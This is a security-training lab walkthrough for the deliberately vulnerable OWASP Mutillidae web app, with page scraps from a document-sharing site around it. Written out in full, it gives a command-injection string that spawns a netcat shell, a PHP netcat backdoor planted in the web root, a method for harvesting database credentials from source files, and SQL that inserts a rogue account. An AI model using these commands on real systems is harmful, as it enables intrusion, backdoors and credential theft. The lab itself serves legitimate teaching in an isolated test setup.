Mutillidae - Lesson 3 - Command Injection Netcat Session PDF

12/4/2016 Mutillidae: Lesson 3: Command Injection Netcat Session
ComputerSecurityStudent (CSS) [Login] [Join Now]
HOME UNIX WINDOWS SECURITY TOOLS FORENSICS SHOPPING GET STARTED CONTACT US
|SECURITY TOOLS >> Mutillidae Project >> Mutillidae 2.5.11 >> Current Page |Views:
5421

(Mutillidae: Lesson 3)

{ Command Injection Netcat Session } Help
ComputerSecurityStudent
pay for continued
research,
Section 0. Background Information resources & bandwidth

What Mutillidae?
OWASP Mutillidae II is a free, open source, deliberately vulnerable
webapplication providing a target for websecurity enthusiast.
What is Command Injection?
Command Injection occurs when an attacker is able to run operating
system commands or serverside scripts from the web application. This
vulnerability potential occurs when a web application allows you to
commonly do a nslookup, whois, ping, traceroute and more from their
webpage. You can test for the vulnerability by using a technique
called fuzzing, where a ";" or "|" or "||" or "&" or "&&" is append to
the end of the expected input (eg., www.cnn.com) followed by a command
(eg., cat /etc/passwd).
What is netcat?
Netcat is a computer networking service for reading from and writing
to network connections using TCP or UDP. Netcat is designed to be a
dependable "backend" device that can be used directly or easily
driven by other programs and scripts. At the same time, it is a
featurerich network debugging and investigation tool, since it can
produce almost any kind of correlation you would need and has a number
of builtin capabilities. Netcat is often referred to as a "Swissarmy
knife for TCP/IP". Its list of features includes port scanning,
transferring files, and port listening, and it can be used as a
backdoor.
PreRequisite Lab
1. Mutillidae: Lesson 1: How to Install Mutillidae in Fedora 14
Note: Remote database access has been turned on to provide an
additional vulnerability.
2. BackTrack: Lesson 1: Installing BackTrack 5 R1
Note: This is not absolutely necessary, but if you are a computer
security student or professional, you should have a BackTrack VM.
Lab Notes
In this lab we will do the following:
1. Execute netcat using the command injection/execution
vulnerability.
2. Create a netcat backdoor outside of the command injection
vulnerability.
3. Conduct PHP Reconnaissance
4. Conduct Database Reconnaissance
5. Add a user to the nowasp.accounts table.
Legal Disclaimer
As a condition of your use of this Web site, you warrant to
computersecuritystudent.com that you will not use this Web site for
any purpose that is unlawful or that is prohibited by these terms,
conditions, and notices.
https://www.computersecuritystudent.com/SECURITY_TOOLS/MUTILLIDAE/MUTILLIDAE_2511/lesson3/index.html 1/27
In accordance with UCC § 2316, this product is provided with "no
warranties, either express or implied." The information contained is
provided "asis", with "no guarantee of merchantability."
In addition, this is a teaching website that does not condone
malicious behavior of any kind.
You are on notice, that continuing and/or using this lab outside your
"own" test environment is considered malicious and is against the law.
© 2013 No content replication of any kind is allowed without express
written permission.
Section 1: Configure Fedora14 Virtual Machine Settings
1. Start VMware Player
Instructions
1. For Windows 7
1. Click Start Button
2. Search for "vmware player"
3. Click VMware Player
2. For Windows XP
Starts > Programs > VMware Player
2. Edit Fedora Mutillidae Virtual Machine Settings
Instructions:
1. Highlight fedora14
2. Click Edit virtual machine settings
3. Edit Network Adapter
Instructions:
1. Highlight Network Adapter
2. Select Bridged
3. Click the OK Button
Section 2: Login to Fedora14 Mutillidae
1. Start Fedora14 VM Instance
Instructions:
1. Start Up VMWare Player
2. Select Fedora14 Mutillidae
3. Play virtual machine
2. Login to Fedora14 Mutillidae
Instructions:
1. Login: student
2. Password: <whatever you set it to>.
Section 3: Open Console Terminal and Retrieve IP Address
1. Start a Terminal Console
Instructions:
1. Applications > Terminal
2. Switch user to root
Instructions:
1. su root
2. <Whatever you set the root password to>
3. Get IP Address
Instructions:
1. ifconfig a
Notes (FYI):
As indicated below, my IP address is 192.168.1.111.
Please record your IP address.
Section 4: Configure BackTrack Virtual Machine Settings
1. Start VMware Player
Instructions
1. For Windows 7
1. Click Start Button
2. Search for "vmware player"
3. Click VMware Player
2. For Windows XP
Starts > Programs > VMware Player
2. Edit the BackTrack5R1 VM
Instructions:
1. Select BackTrack5R1 VM
2. Click Edit virtual machine settings
3. Edit Virtual Machine Settings
Instructions:
1. Click on Network Adapter
2. Click on the Bridged Radio button
3. Click on the OK Button
Section 5: Play and Login to BackTrack
1. Play the BackTrack5R1 VM
Instructions:
1. Click on the BackTrack5R1 VM
2. Click on Play virtual machine

2. Login to BackTrack
Instructions:
1. Login: root
2. Password: toor or <whatever you changed it to>.
3. Bring up the GNOME
Instructions:
1. Type startx
Section 6: Open Console Terminal and Retrieve IP Address
1. On BackTrack, Start up a terminal window
Instructions:
1. Click on the Terminal Window

2. Obtain the IP Address
Instructions:
1. ifconfig a
Note(FYI):
My IP address 192.168.1.109.
In your case, it will probably be different.
This is the machine that will be use to attack the victim machine
(Metasploitable).
Section 7: Start Web Browser Session to Mutillidae
1. On BackTrack, Open Firefox
Instructions:
1. Click on the Firefox Icon
Notes (FYI):
If FireFox Icon does not exist in the Menu Bar Tray, then go to
Applications > Internet > Firefox Web Browser
2. Open Mutillidae
Notes (FYI):
Replace 192.168.1.111 in the following URL >
http://192.168.1.111/mutillidae, with your Mutillidae's IP Address
obtained from (Section 3, Step 3)
Instructions:
1. http://192.168.1.111/mutillidae
Section 8: Netcat Command Execution
1. Go to DNS Lookup
Instructions:
1. OWASP Top 10 > A2 Cross Site Scripting (XSS) > Reflected
(First Order) > DNS Lookup

2. Execute Netcat
Notes(FYI):
Below we are going to append NetCat to the basic nslookup test.
:)
Instructions:
1. www.cnn.com;mkfifo /tmp/pipe;sh /tmp/pipe | nc l 4444 > /tmp/pipe
Make a FIFO named pipe.
Pipes allow separate processes to communicate without having
been designed explicitly to work together.
This will allow two processes to connect to netcat.
nc l 4444, tells netcat to listen and allow connections on
port 4444.
2. Click Lookup DNS
3. Continue to next step
Note: No results will be displayed to this webpage, please
continue to next step.

3. Verifying Results
Note(FYI):
1. Notice in the upper left tab, there is a connection pinwheel that
constantly spins.
2. Notice in the lower left corner, the status bar displays the
message transferring data.
3. Both of these messages are a good signs that netcat is running and
listening for a connection.
Instructions:
1. Continue to next section.
Section 9: Connecting to Netcat
1. Connect to Netcat
Notes(FYI):
Implement the following instructions on the BackTrack VM
Replace 192.168.1.111 with the Fedora(Mutillidae) IP Address
obtained from (Section 3, Step 3).
Instructions:
1. nc 192.168.1.111 4444
Use BackTrack to Connect to the Mutillidae Netcat session on
port 4444
2. hostname
This is server hostname that hosts DVWA.
3. whoami
Print the effective UserID.
Ie., Who am I connected as.
2. Directory and Username Reconnaissance
Notes (FYI):
We already know that we connected as the apache user, but we also
want to know what is our current working directory.
Also, we want to know if we have the ability to create a file
within the current working directory.
Instructions:
1. pwd
Print the current working directory
2. uname a
Print system information (eg., Operating System & Version,
Kernel, etc).
3. cat /etc/passwd > passwd.txt
Create a passwd.txt file located in /var/www/html/mutillidae
4. ls l $PWD/passwd.txt
List the passwd.txt file.
Section 10: Viewing /etc/passwd
1. Open New FireFox Tab
Notes (FYI):
Perform the following instructions on BackTrack's Firefox.
Instructions:
1. Click on the Green Plus to create a new tab

2. View /etc/passwd
Notes (FYI):
Replace 192.168.1.111 with the Fedora (Mutillidae) IP Address
obtained in (Section 3, Step 3).
It nice to be able to view the password file, but the real feat
was to be able to create a file and view it on the apache
webserver. (Prepare for some black magic).
Instructions:
1. Place the following link in the Address Bar.
http://192.168.1.111/mutillidae/passwd.txt
Section 11: Create PHP Backdoor
1. Discover the Database Engine using the /etc/passwd file
Notes (FYI):
Perform the following instructions using your previous BackTrack
Terminal Netcat session.
We now we can create a file on the Apache Webserver in the
/var/www/html/mutillidae directory.
Let's create a php script that will serve as a netcat backdoor
without having to execute netcat using the nslookup command
execution.
Instructions:
1. echo "<?php system(\"mkfifo /tmp/pipe2;sh /tmp/pipe2 | nc ‐l 3333 > /tmp/pipe2\"); ?>" >
nc_connect.php
2. ls l $PWD/nc_connect.php
3. chmod 700 nc_connect.php
4. ls l $PWD/nc_connect.php
5. cat nc_connect.php
2. Execute nc_connect.php
Notes (FYI):
Perform the next steps in BackTrack's second Firefox tab.
obtain in (Section 3, Step 3).
Use the second Firefox tab that you previously viewed the
/etc/passwd file with to execute the nc_connect.php script.
Instructions:
1. Place the following link in the Address Bar.
http://192.168.1.111/mutillidae/nc_connect.php
2. Continue to Next Step
3. On BackTrack, Start up a "another" terminal window
Instructions:
1. Click on the Terminal Window
4. Viewing your netcat sessions
Notes (FYI):
This terminal window will be used to connect to the nc_config.php
netcat session.
obtain in (Section 3, Step 3).
Instructions:
1. nc 192.168.1.111 3333
2. whoami
3. ps eaf | egrep '(3333|4444)'
Section 10: PHP Script Interrogation
1. List all php scripts
Notes (FYI):
Perform the next steps in the nc_config.php netcat terminal.
Our next step is to try to figure out if any of the php scripts
located under /var/www/html/mutillidae contain a database username
and password.
But, first, let's count all the php scripts and include files.
Instructions:
1. pwd
This show the current working directory to be
/var/www/html/mutillidae.
2. find * name "*.php" | wc l
Count the number of php script located in the current working
directory.
3. find * name "*.inc" | wc l
Count the number of php include files located in the current
working directory.
2. List all php scripts
Notes (FYI):
Now we are going to search each include file (*.inc) for the
string "password" AND the strings "db" OR "database".
Instructions:
1. find * name "*.inc" | xargs grep i password | egrep i
'(db|database)'
find * name "*.inc", find all files with the *.inc extension
in the current working directory.
xargs, build and execute command lines from standard input
grep i password, ignore case and search for the string
"password".
egrep i '(db|database)', ignore case and search for the
strings "db" OR "database".
3. Search php scripts for the string password
Notes (FYI):
Now we will search the 900+ php scripts for the string "password"
AND the strings ("db" OR "database") AND the string "=".
I will use head 8 to show only the first 8 lines, but feel free
to remove the "| head 8" to see all the results.
The name of the script that contains the database password is
MySQLHandler.php.
Instructions:
1. find * ‐name "*.php" | xargs grep ‐i password | egrep ‐i '(db|database)' | grep "=" |
head ‐8
4. Search MySQLHandler.php for authentication information
Notes (FYI):
Below I will search the MySQLHandler.php script for the strings
(password OR username OR database) and the string "=".
Notice the username (root), password (samurai), and database
(nowasp) is listed in the results.
Instructions:
1. find * ‐name "MySQLHandler.php" | xargs egrep ‐i '(password|username|database)' | grep "="
| head ‐10

Section 11: Database Interrogation
1. Basic Database Interrogation
Notes (FYI):
Perform the next steps in the nc_config.php netcat terminal.
The below command shows you how to execute database commands in
the netcat session.
show databases, allows you to view all databases.
use nowasp; show tables, means use the nowasp database and show
its's tables.
Instructions:
1. echo "show databases;" | mysql uroot psamurai
2. echo "use nowasp; show tables;" | mysql uroot psamurai
2. Interrogate the accounts table
Notes (FYI):
The below command shows you how to view the column fields of the
accounts tables.
In addition, you will run a basic select statement to view the
contents of the accounts table.
Instructions:
1. echo "use nowasp; desc accounts;" | mysql uroot psamurai
2. echo "select * from nowasp.accounts;" | mysql uroot psamurai
3. Create a new user in the accounts table
Notes (FYI):
The below command shows you how to create a new username using the
MySQL insert command.
Pay attention to the last record of your select statement results.
Instructions:
1. echo "insert into nowasp.accounts values
(null,'hacker33','p4sSw0rd!','H4ck 4 fo0d','TRUE');" | mysql
uroot psamurai
2. echo "select * from nowasp.accounts;" | mysql uroot psamurai

Section 12: Proof of Lab
1. Proof of Lab
Notes (FYI):
Perform the next steps in the nc_config.php netcat terminal
Use nc_config.php netcat session for the below directions.
Instructions:
1. echo "select * from nowasp.accounts where username = 'hacker33';" | mysql ‐uroot ‐
psamurai
2. netstat nao | egrep '(3333|4444)'
3. date
4. echo "Your Name"
Replace the string "Your Name" with your actual name.
e.g., echo "John Gray"
Proof of Lab Instructions
1. Press both the <Ctrl> and <Alt> keys at the same time.
2. Do a <PrtScn>
3. Paste into a word document
4. Upload to Moodle

Mutillidae - Lesson 3 - Command Injection Netcat Session PDF

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Mutillidae - Lesson 3 - Command Injection Netcat Session PDF

Uploaded by

Copyright:

Available Formats

12/4/2016 Mutillidae: Lesson 3: Command Injection Netcat Session

ComputerSecurityStudent (CSS) [Login] [Join Now]

HOME UNIX WINDOWS SECURITY TOOLS FORENSICS SHOPPING GET STARTED CONTACT US

You might also like